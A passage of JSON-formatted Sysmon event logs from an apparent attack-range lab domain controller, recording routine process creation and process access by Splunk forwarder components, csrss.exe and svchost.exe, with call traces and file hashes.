Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.157","SourceProcessGUID":"{41C8662E-20B4-5F25-0000-001030530600}","SourceProcessId":"816","SourceThreadId":"1344","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4287,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.612\r\nProcessGuid: {41C8662E-20B4-5F25-0000-001008550600}\r\nProcessId: 4136\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.612","ProcessGuid":"{41C8662E-20B4-5F25-0000-001008550600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4288,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20B4-5F25-0000-001008550600}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20B4-5F25-0000-001008550600}","TargetProcessId":"4136","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4289,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20B4-5F25-0000-001008550600}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20B4-5F25-0000-001008550600}","TargetProcessId":"4136","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4290,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4291,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4292,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4293,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4294,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-0